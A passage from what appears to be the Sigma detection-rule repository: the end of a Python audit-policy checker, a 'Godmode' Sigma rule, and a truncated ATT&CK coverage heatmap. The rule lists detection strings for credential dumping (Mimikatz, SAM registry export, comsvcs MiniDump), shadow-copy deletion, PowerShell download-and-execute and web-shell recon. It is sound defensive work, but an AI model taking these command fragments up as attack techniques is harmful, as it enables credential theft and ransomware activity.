Requires:".format(os.path.basename(filename), specific_eids)) for i in specific_subcategory: print(" - '{}' / {} to be enabled".format(i[1], i[0])) else: if len(specific_subcategory) != 0: print("-> Rule '{}' uses EventIDs: {} which Requires: '{}' / {} to be enabled".format(os.path.basename(filename), specific_eids, specific_subcategory[0][1], specific_subcategory[0][0])) else: print("Generating generic logging requirements information for the rule set...") sleep(1) # If no verbose mode was triggered we generate a generic audit policy suggestion for all rules # Process Creation Rules if windows_category_process_creation_dict: enable_sysmon = False enable_4688 = False print(f"\nChecking rules with logsource - 'product: windows / category: process_creation'...") # We check special fields. If they exist then we suggest the policy to be enabled all_process_creation_fields = [] for filename, fields in windows_category_process_creation_dict.items(): all_process_creation_fields += fields all_process_creation_fields = list(set(all_process_creation_fields)) for field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS: if field in all_process_creation_fields: enable_sysmon = True print("-> Rules use Sysmon EID 1 only fields. A Sysmon configuration monitoring Process Creation is required") break if not enable_sysmon: for field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS: if field in all_process_creation_fields: if "{0CCE922B-69AE-11D9-BED3-505054503030}" not in subcategory_id: enable_4688 = True print("-> Rules use Microsoft-Windows-Security-Auditing EID 4688 only fields. 
Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled") break else: print("Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' is already enabled") break if not enable_4688: print("-> Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled") if windows_category_ps_module_dict: print(f"\nChecking rules with logsource - 'product: windows / category: ps_module'...") pwsh5 = "Windows Components/Windows PowerShell" #pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks if pwsh5 in enabled_other_logs: if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] != "Enabled": print("-> Rules use Microsoft-Windows-PowerShell EID 4103. Audit policy 'Module Logging' must be enabled") else: print("-> PowerShell 'Module Logging' is Enabled") if windows_category_ps_script_dict: print(f"\nChecking rules with logsource - 'product: windows / category: ps_script'...") pwsh5 = "Windows Components/Windows PowerShell" #pwsh7 = "PowerShell Core" # TODO: Add PWSH7 Checks if pwsh5 in enabled_other_logs: if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] != "Enabled": print("-> Rules use Microsoft-Windows-PowerShell EID 4104. Audit policy PowerShell 'Script Block Logging' must be enabled") else: print("-> PowerShell 'Script Block Logging' is Enabled") if windows_service_security_dict: print(f"\nChecking rules using logsource - 'product: windows / service: security'...") all_security_eids = [] for filename, eids in windows_service_security_dict.items(): all_security_eids += eids all_security_eids = list(set(all_security_eids)) for eid in all_security_eids: for key, value in SECURITY_EVENT_ID_MAPPING.items(): if value['EventIDs']: if ((eid in value['EventIDs']) and (key not in subcategory_id)): print("-> Rules use events generated from audit policy sub-category '{}'. 
The audit policy '{}' must be enabled".format(key, value['Name'])) subcategory_id.append(key) print("\nFor more information on how to setup logging, you can visit: https://github.com/SigmaHQ/sigma/tree/master/rules-documentation/logsource-guides") ================================================ FILE: other/godmode_sigma_rule.yml ================================================ # _____ __ __ ___ __ # / ___/__ ___/ / / |/ /__ ___/ /__ # / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_) # \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_ # / __(_)__ ___ _ ___ _ / _ \__ __/ /__ # _\ \/ / _ `/ ' \/ _ `/ / , _/ // / / -_) # /___/_/\_, /_/_/_/\_,_/ /_/|_|\_,_/_/\__/ # /___/ IDDQD # # Florian Roth # May 2020 # v0.3 # # A Proof-of-Concept with the most effective search queries title: Godmode Sigma Rule id: def6caac-a999-4fc9-8800-cfeff700ba98 description: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?' status: experimental author: Florian Roth (Nextron Systems) date: 2019-12-22 modified: 2022-08-04 level: high action: global --- logsource: category: process_creation product: windows detection: # Different suspicious or malicious command line parameters selection_plain: CommandLine|contains: - ' -NoP ' # Often used in malicious PowerShell commands - ' -W Hidden ' # Often used in malicious PowerShell commands - ' -decode ' # Used with certutil - ' /decode ' # Used with certutil - ' -e* JAB' # PowerShell encoded commands - ' -e* SUVYI' # PowerShell encoded commands - ' -e* SQBFAFgA' # PowerShell encoded commands - ' -e* aWV4I' # PowerShell encoded commands - ' -e* IAB' # PowerShell encoded commands - ' -e* PAA' # PowerShell encoded commands - ' -e* aQBlAHgA' # PowerShell encoded commands - 'vssadmin delete shadows' # Ransomware - 'reg SAVE HKLM\SAM' # save registry SAM - syskey extraction - ' -ma ' # ProcDump - 'Microsoft\Windows\CurrentVersion\Run' # Run key in command line - often in combination with REG ADD - 
'.downloadstring(' # PowerShell download command - '.downloadfile(' # PowerShell download command - ' /ticket:' # Rubeus - ' sekurlsa' # Mimikatz - ' p::d ' # Mimikatz - ';iex(' # PowerShell IEX - 'schtasks* /create *AppData' # Scheduled task creation pointing to AppData - ' comsvcs.dll,MiniDump' # Process dumping method apart from procdump - ' comsvcs.dll,#24' # Process dumping method apart from procdump - ' comsvcs.dll MiniDump' # Process dumping method apart from procdump - ' comsvcs.dll #24' # Process dumping method apart from procdump - ' comsvcs `#' # Process dumping method apart from procdump - ' comsvcs #' # Process dumping method apart from procdump - ' comsvcs MiniDump' # Process dumping method apart from procdump - '.dmp full' # Process dumping method apart from procdump selection_parent_child: ParentImage|contains: # Office Dropper Detection - '\WINWORD.EXE' - '\EXCEL.EXE' - '\POWERPNT.exe' - '\MSPUB.exe' - '\VISIO.exe' - '\OUTLOOK.EXE' Image|contains: - '\cmd.exe' - '\powershell.exe' - '\pwsh.exe' - '\wscript.exe' - '\cscript.exe' - '\schtasks.exe' - '*\scrcons.exe' - '\regsvr32.exe' - '\hh.exe' - '\wmic.exe' - '\mshta.exe' - '\msiexec.exe' - '\forfiles.exe' - '\AppData\' selection_webshells: Image|contains: - '\apache*' - '\tomcat*' - '\w3wp.exe' - '\php-cgi.exe' - '\nginx.exe' - '\httpd.exe' CommandLine|contains: - 'whoami' - 'net user ' - 'ping -n ' - 'systeminfo' - '&cd&echo' - 'cd /d ' # https://www.computerhope.com/cdhlp.htm # Running whoami as LOCAL_SYSTEM (usually after privilege escalation) selection_whoami: Image|contains: '\whoami.exe' User|contains: - 'AUTHORI' - 'AUTORI' condition: 1 of them --- logsource: product: windows service: sysmon detection: selection_file_creation: EventID: 11 TargetFilename|contains: - '.dmp' # dump process memory - 'Desktop\how' # Ransomware - 'Desktop\decrypt' # Ransomware selection_registry_modifications: EventID: - 12 - 13 TargetObject|contains: - 'UserInitMprLogonScript' # persistence - 
'\CurrentVersion\Image File Execution Options\' # persistence selection_registry_run: EventID: - 12 - 13 TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\Run\' # persistence - '\Microsoft\Windows\CurrentVersion\RunOnce\' # persistence Details|contains: - 'AppData' - '\Users\Public\' - '\Temp\' - 'powershell' - 'wscript' - 'cscript' condition: 1 of them --- logsource: product: windows service: system detection: # Malicious service installs selection: EventID: 7045 ServiceName|contains: - 'WCESERVICE' - 'WCE SERVICE' - 'winexesvc' - 'DumpSvc' - 'pwdump' - 'gsecdump' - 'cachedump' condition: 1 of them ================================================ FILE: other/sigma_attack_nav_coverage.json ================================================ { "name": "Sigma Analytics Coverage", "versions": { "attack": "18.1", "navigator": "4.8.1", "layer": "4.4" }, "domain": "enterprise-attack", "description": "Sigma coverage heatmap generated by Sigma CLI with score function count", "gradient": { "colors": [ "#66b1ffff", "#ff66f4ff" ], "minValue": 0, "maxValue": 20 }, "techniques": [ { "techniqueID": "T1078", "tactic": "defense-evasion", "score": 60, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078", "tactic": "persistence", "score": 60, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078", "tactic": "privilege-escalation", "score": 60, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078", "tactic": "initial-access", "score": 60, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1114.003", "tactic": "collection", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1090", "tactic": 
"command-and-control", "score": 22, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1606", "tactic": "credential-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1528", "tactic": "credential-access", "score": 14, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1140", "tactic": "defense-evasion", "score": 18, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098", "tactic": "persistence", "score": 29, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098", "tactic": "privilege-escalation", "score": 29, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1589", "tactic": "reconnaissance", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1110", "tactic": "credential-access", "score": 25, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.004", "tactic": "defense-evasion", "score": 40, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.004", "tactic": "persistence", "score": 40, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.004", "tactic": "privilege-escalation", "score": 40, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.004", "tactic": "initial-access", "score": 40, "color": "", "comment": "", "enabled": true, 
"metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552", "tactic": "credential-access", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548", "tactic": "privilege-escalation", "score": 22, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548", "tactic": "defense-evasion", "score": 22, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556", "tactic": "credential-access", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556", "tactic": "defense-evasion", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556", "tactic": "persistence", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.003", "tactic": "persistence", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.003", "tactic": "privilege-escalation", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.001", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.001", 
"tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.005", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1098.005", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1485", "tactic": "impact", "score": 20, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1496", "tactic": "impact", "score": 13, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1489", "tactic": "impact", "score": 19, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.003", "tactic": "execution", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.003", "tactic": "persistence", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.003", "tactic": "privilege-escalation", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.007", "tactic": "credential-access", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.004", "tactic": "defense-evasion", "score": 29, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.001", "tactic": "credential-access", "score": 24, "color": "", "comment": "", "enabled": true, "metadata": [], 
"links": [], "showSubtechniques": false }, { "techniqueID": "T1562.007", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1565.001", "tactic": "impact", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003", "tactic": "credential-access", "score": 34, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059", "tactic": "execution", "score": 94, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562", "tactic": "defense-evasion", "score": 27, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.001", "tactic": "defense-evasion", "score": 127, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1578", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1578.003", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1531", "tactic": "impact", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1621", "tactic": "credential-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556.006", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556.006", "tactic": "defense-evasion", "score": 
3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1556.006", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1087.004", "tactic": "discovery", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1526", "tactic": "discovery", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1565", "tactic": "impact", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1074", "tactic": "collection", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484.002", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1484.002", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1114", "tactic": "collection", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1573", "tactic": "command-and-control", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1199", "tactic": "initial-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1537", "tactic": "exfiltration", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1486", 
"tactic": "impact", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1020", "tactic": "exfiltration", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1136.003", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070", "tactic": "defense-evasion", "score": 20, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550", "tactic": "lateral-movement", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550.001", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550.001", "tactic": "lateral-movement", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1190", "tactic": "initial-access", "score": 146, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.001", "tactic": "execution", "score": 217, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.003", "tactic": "execution", "score": 44, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.004", "tactic": "execution", "score": 14, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], 
"showSubtechniques": false }, { "techniqueID": "T1059.009", "tactic": "execution", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.007", "tactic": "lateral-movement", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.008", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1608.003", "tactic": "resource-development", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1525", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1566", "tactic": "initial-access", "score": 14, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1566.002", "tactic": "initial-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1580", "tactic": "discovery", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1619", "tactic": "discovery", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1005", "tactic": "collection", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1490", "tactic": "impact", "score": 26, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1136", "tactic": "persistence", "score": 3, "color": "", "comment": "", 
"enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.002", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.002", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.002", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.002", "tactic": "initial-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1555", "tactic": "credential-access", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1105", "tactic": "command-and-control", "score": 81, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027", "tactic": "defense-evasion", "score": 94, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1567", "tactic": "exfiltration", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1568.002", "tactic": "command-and-control", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1572", "tactic": "command-and-control", "score": 24, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1102", "tactic": "command-and-control", "score": 13, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1571", "tactic": "command-and-control", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1082", "tactic": "discovery", "score": 33, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056.001", "tactic": "collection", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056.001", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1123", "tactic": "collection", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.009", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.009", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1201", "tactic": "discovery", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1069.001", "tactic": "discovery", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1007", "tactic": "discovery", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1222.002", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.012", "tactic": "execution", "score": 9, "color": "", "comment": "", "enabled": true, 
"metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1529", "tactic": "impact", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1083", "tactic": "discovery", "score": 24, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1048.003", "tactic": "exfiltration", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1133", "tactic": "persistence", "score": 19, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1133", "tactic": "initial-access", "score": 19, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553.004", "tactic": "defense-evasion", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1033", "tactic": "discovery", "score": 30, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1593.003", "tactic": "reconnaissance", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1115", "tactic": "collection", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564", "tactic": "defense-evasion", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.002", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1087.001", "tactic": "discovery", "score": 13, 
"color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1018", "tactic": "discovery", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1203", "tactic": "execution", "score": 31, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1068", "tactic": "privilege-escalation", "score": 29, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1592.004", "tactic": "reconnaissance", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.012", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.006", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1554", "tactic": "persistence", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1046", "tactic": "discovery", "score": 15, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1587", "tactic": "resource-development", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.004", "tactic": "defense-evasion", "score": 15, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1653", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1036", "tactic": "defense-evasion", "score": 40, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1016", "tactic": "discovery", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1505.003", "tactic": "persistence", "score": 34, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1219.002", "tactic": "command-and-control", "score": 44, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1049", "tactic": "discovery", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.003", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1014", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1518.001", "tactic": "discovery", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548.001", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548.001", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1071.001", "tactic": "command-and-control", "score": 40, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.002", "tactic": "execution", "score": 8, "color": "", "comment": "", 
"enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.002", "tactic": "persistence", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053.002", "tactic": "privilege-escalation", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.006", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.006", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.006", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1136.001", "tactic": "persistence", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1204.001", "tactic": "execution", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": 